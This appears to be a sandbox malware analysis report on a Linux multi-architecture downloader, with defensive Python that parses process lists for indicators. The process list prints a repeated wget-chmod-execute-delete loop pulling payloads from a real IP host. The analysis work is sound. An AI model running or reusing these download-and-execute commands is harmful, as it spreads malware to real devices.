Malware Analysis Report

2024-11-15 05:21

Sample ID: 240617-e4gzfavaka
Target: b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118
SHA256: 315c6dff5c2f03934edeeda81919c9558dcb124f1c985160e7d25fa3f01243b1
Tags: none
Score: 1/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
1/10

SHA256

315c6dff5c2f03934edeeda81919c9558dcb124f1c985160e7d25fa3f01243b1

Threat Level: No (potentially) malicious behavior was detected (automated verdict; no signatures fired)

The file b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118 received the automated verdict "No (potentially) malicious behavior was detected", which is why the score is 1/10. That verdict should not be taken at face value. The behavioral1 run (ubuntu1804-amd64) records a repeated wget -> chmod +x -> execute -> rm -rf loop against http://171.22.24.217/: thirteen fetches of twelve distinct payloads (p-p.c-.GHOUL is requested twice), each made executable, run from /tmp and deleted. The behavioral2 run (debian9-armhf) contacts the same host thirteen times. The payload names (m-i.p-s, m-p.s-l, s-h.4-, x-8.6-, a-r.m-6, x-3.2-, a-r.m-7, p-p.c-, i-5.8-6, m-6.8-k, a-r.m-4, a-r.m-5) spell out CPU architectures (mips, mpsl, sh4, x86, arm6, x32, arm7, ppc, i586, m68k, arm4, arm5) once the dots and dashes are removed. That is the behaviour of a multi-architecture downloader script; the low score reflects the absence of signature matches, not the absence of suspicious activity.

Malicious Activity Summary

N/A (no signature-based detections; the download-execute-delete loop is visible in the behavioral1 process list)

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2024-06-17 04:29

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-17 04:29

Reported

2024-06-17 04:29

Platform

debian9-mipsbe-20240611-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-17 04:29

Reported

2024-06-17 04:29

Platform

debian9-mipsel-20240418-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-17 04:29

Reported

2024-06-17 04:32

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

3s

Max time network

128s

Command Line

[/tmp/b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118]

Signatures

N/A

Processes

Binary              Command line
/tmp/b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118  /tmp/b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118
/usr/bin/wget       wget http://171.22.24.217/m-i.p-s.GHOUL
/bin/chmod          chmod +x m-i.p-s.GHOUL
/tmp/m-i.p-s.GHOUL  ./m-i.p-s.GHOUL
/bin/rm             rm -rf m-i.p-s.GHOUL
/usr/bin/wget       wget http://171.22.24.217/m-p.s-l.GHOUL
/bin/chmod          chmod +x m-p.s-l.GHOUL
/tmp/m-p.s-l.GHOUL  ./m-p.s-l.GHOUL
/bin/rm             rm -rf m-p.s-l.GHOUL
/usr/bin/wget       wget http://171.22.24.217/s-h.4-.GHOUL
/bin/chmod          chmod +x s-h.4-.GHOUL
/tmp/s-h.4-.GHOUL   ./s-h.4-.GHOUL
/bin/rm             rm -rf s-h.4-.GHOUL
/usr/bin/wget       wget http://171.22.24.217/x-8.6-.GHOUL
/bin/chmod          chmod +x x-8.6-.GHOUL
/tmp/x-8.6-.GHOUL   ./x-8.6-.GHOUL
/bin/rm             rm -rf x-8.6-.GHOUL
/usr/bin/wget       wget http://171.22.24.217/a-r.m-6.GHOUL
/bin/chmod          chmod +x a-r.m-6.GHOUL
/tmp/a-r.m-6.GHOUL  ./a-r.m-6.GHOUL
/bin/rm             rm -rf a-r.m-6.GHOUL
/usr/bin/wget       wget http://171.22.24.217/x-3.2-.GHOUL
/bin/chmod          chmod +x x-3.2-.GHOUL
/tmp/x-3.2-.GHOUL   ./x-3.2-.GHOUL
/bin/rm             rm -rf x-3.2-.GHOUL
/usr/bin/wget       wget http://171.22.24.217/a-r.m-7.GHOUL
/bin/chmod          chmod +x a-r.m-7.GHOUL
/tmp/a-r.m-7.GHOUL  ./a-r.m-7.GHOUL
/bin/rm             rm -rf a-r.m-7.GHOUL
/usr/bin/wget       wget http://171.22.24.217/p-p.c-.GHOUL
/bin/chmod          chmod +x p-p.c-.GHOUL
/tmp/p-p.c-.GHOUL   ./p-p.c-.GHOUL
/bin/rm             rm -rf p-p.c-.GHOUL
/usr/bin/wget       wget http://171.22.24.217/i-5.8-6.GHOUL
/bin/chmod          chmod +x i-5.8-6.GHOUL
/tmp/i-5.8-6.GHOUL  ./i-5.8-6.GHOUL
/bin/rm             rm -rf i-5.8-6.GHOUL
/usr/bin/wget       wget http://171.22.24.217/m-6.8-k.GHOUL
/bin/chmod          chmod +x m-6.8-k.GHOUL
/tmp/m-6.8-k.GHOUL  ./m-6.8-k.GHOUL
/bin/rm             rm -rf m-6.8-k.GHOUL
/usr/bin/wget       wget http://171.22.24.217/p-p.c-.GHOUL
/bin/chmod          chmod +x p-p.c-.GHOUL
/tmp/p-p.c-.GHOUL   ./p-p.c-.GHOUL
/bin/rm             rm -rf p-p.c-.GHOUL
/usr/bin/wget       wget http://171.22.24.217/a-r.m-4.GHOUL
/bin/chmod          chmod +x a-r.m-4.GHOUL
/tmp/a-r.m-4.GHOUL  ./a-r.m-4.GHOUL
/bin/rm             rm -rf a-r.m-4.GHOUL
/usr/bin/wget       wget http://171.22.24.217/a-r.m-5.GHOUL
/bin/chmod          chmod +x a-r.m-5.GHOUL
/tmp/a-r.m-5.GHOUL  ./a-r.m-5.GHOUL
/bin/rm             rm -rf a-r.m-5.GHOUL
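
The process records above are the raw material for a triage decision the sandbox's signature engine did not make. As an added example (not part of this report, and not code from the sandbox vendor), the following Python reconstructs the download-execute-delete loop from a process list in exactly the format printed above, decodes the CPU architecture hidden in each file name, and collects the IOCs an analyst would pivot on. SAMPLE_PROCESS_LIST is a constructed excerpt of the behavioral1 records; the function names are my own.

```python
"""Reconstruct a wget -> chmod +x -> execute -> rm downloader loop from a
flattened sandbox process list and extract the IOCs it exposes.

Added example; not part of the original report. Function names are the
author's own, and SAMPLE_PROCESS_LIST is a constructed excerpt of the
behavioral1 records shown on the page.
"""
import re
from urllib.parse import urlparse

# Constructed excerpt of the behavioral1 process list: binary path on one
# line, the recorded argv in square brackets on the next.
SAMPLE_PROCESS_LIST = """
/tmp/b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118
[/tmp/b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118]
/usr/bin/wget
[wget http://171.22.24.217/m-i.p-s.GHOUL]
/bin/chmod
[chmod +x m-i.p-s.GHOUL]
/tmp/m-i.p-s.GHOUL
[./m-i.p-s.GHOUL]
/bin/rm
[rm -rf m-i.p-s.GHOUL]
/usr/bin/wget
[wget http://171.22.24.217/x-8.6-.GHOUL]
/bin/chmod
[chmod +x x-8.6-.GHOUL]
/tmp/x-8.6-.GHOUL
[./x-8.6-.GHOUL]
/bin/rm
[rm -rf x-8.6-.GHOUL]
"""


def parse_process_list(text):
    """Pair each binary-path line with the bracketed argv line that follows it."""
    procs = []
    for line in (l.strip() for l in text.splitlines()):
        if not line:
            continue
        if line.startswith("[") and line.endswith("]") and procs:
            procs[-1]["argv"] = line[1:-1].split()
        else:
            procs.append({"binary": line, "argv": []})
    return procs


def decode_arch(filename):
    """Drop the trailing extension and the '-' / '.' padding: 'm-i.p-s.GHOUL' -> 'mips'."""
    stem = filename.rsplit(".", 1)[0] if "." in filename else filename
    return re.sub(r"[-.]", "", stem).lower()


def find_download_exec_chains(procs):
    """Link each wget to the chmod / exec / rm records that act on the fetched file."""
    chains, current = [], None
    for proc in procs:
        argv = proc["argv"]
        if not argv:
            continue
        cmd = argv[0]
        if cmd == "wget" and len(argv) > 1:
            url = urlparse(argv[-1])
            fname = url.path.rsplit("/", 1)[-1]
            current = {"url": argv[-1], "host": url.hostname, "file": fname,
                       "arch": decode_arch(fname),
                       "chmod": False, "executed": False, "deleted": False}
            chains.append(current)
        elif current is None:
            continue  # records before the first download (the script itself)
        elif cmd == "chmod" and "+x" in argv and current["file"] in argv:
            current["chmod"] = True
        elif cmd == "./" + current["file"] or proc["binary"].endswith("/" + current["file"]):
            current["executed"] = True
        elif cmd == "rm" and current["file"] in argv:
            current["deleted"] = True
    return chains


def extract_iocs(chains):
    """Network and file indicators worth pivoting on, de-duplicated and sorted."""
    return {
        "hosts": sorted({c["host"] for c in chains}),
        "urls": sorted({c["url"] for c in chains}),
        "files": sorted({c["file"] for c in chains}),
        "archs": sorted({c["arch"] for c in chains}),
    }


def is_multiarch_downloader(chains):
    """True when at least one fetched file was made executable, run and then removed."""
    return any(c["chmod"] and c["executed"] and c["deleted"] for c in chains)


if __name__ == "__main__":
    chains = find_download_exec_chains(parse_process_list(SAMPLE_PROCESS_LIST))
    for c in chains:
        print(f"{c['arch']:6} {c['url']}  chmod={c['chmod']} exec={c['executed']} rm={c['deleted']}")
    print("downloader pattern:", is_multiarch_downloader(chains))
    print(extract_iocs(chains))
```

Run against the full list, the chain walker yields thirteen chains over twelve distinct files and a single host, and every chain completes all three stages; that, not the signature count, is what should drive the verdict. The exec check matches both the argv form (./name) and the binary path (/tmp/name), so it still links the chain when a sandbox records only one of the two.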

Network

Country  Destination          Domain         Proto
IR       171.22.24.217:80     171.22.24.217  tcp
N/A      224.0.0.251:5353     -              udp
IR       171.22.24.217:80     171.22.24.217  tcp
GB       185.125.188.61:443   -              tcp
GB       185.125.188.61:443   -              tcp
US       151.101.193.91:443   -              tcp
US       151.101.193.91:443   -              tcp
IR       171.22.24.217:80     171.22.24.217  tcp
IR       171.22.24.217:80     171.22.24.217  tcp
IR       171.22.24.217:80     171.22.24.217  tcp
GB       195.181.164.19:443   -              tcp
IR       171.22.24.217:80     171.22.24.217  tcp
IR       171.22.24.217:80     171.22.24.217  tcp
IR       171.22.24.217:80     171.22.24.217  tcp
IR       171.22.24.217:80     171.22.24.217  tcp
IR       171.22.24.217:80     171.22.24.217  tcp
IR       171.22.24.217:80     171.22.24.217  tcp
IR       171.22.24.217:80     171.22.24.217  tcp
IR       171.22.24.217:80     171.22.24.217  tcp

The thirteen TCP connections to 171.22.24.217:80 match the thirteen wget invocations in the process list above and are the only traffic the process tree accounts for. 224.0.0.251:5353 is the mDNS multicast address (local service discovery, not traffic directed by the sample). The TLS connections to 185.125.188.61, 151.101.193.91 and 195.181.164.19 carry no domain in this record and no process is attributed to them; on an Ubuntu 18.04 guest they are plausibly operating-system background traffic, but confirm that against a clean-baseline capture of the same image before discounting them.

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-17 04:29

Reported

2024-06-17 04:32

Platform

debian9-armhf-20240611-en

Max time network

18s

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

Country  Destination          Domain         Proto
IR       171.22.24.217:80     171.22.24.217  tcp
IR       171.22.24.217:80     171.22.24.217  tcp
IR       171.22.24.217:80     171.22.24.217  tcp
IR       171.22.24.217:80     171.22.24.217  tcp
IR       171.22.24.217:80     171.22.24.217  tcp
IR       171.22.24.217:80     171.22.24.217  tcp
IR       171.22.24.217:80     171.22.24.217  tcp
IR       171.22.24.217:80     171.22.24.217  tcp
IR       171.22.24.217:80     171.22.24.217  tcp
IR       171.22.24.217:80     171.22.24.217  tcp
IR       171.22.24.217:80     171.22.24.217  tcp
IR       171.22.24.217:80     171.22.24.217  tcp
IR       171.22.24.217:80     171.22.24.217  tcp

Thirteen HTTP connections to the same payload host seen in behavioral1. No process records were captured for this armhf run (Processes: N/A), so the download loop cannot be confirmed from this detonation alone, but the connection count equals the thirteen wget requests recorded on amd64.

Files

N/A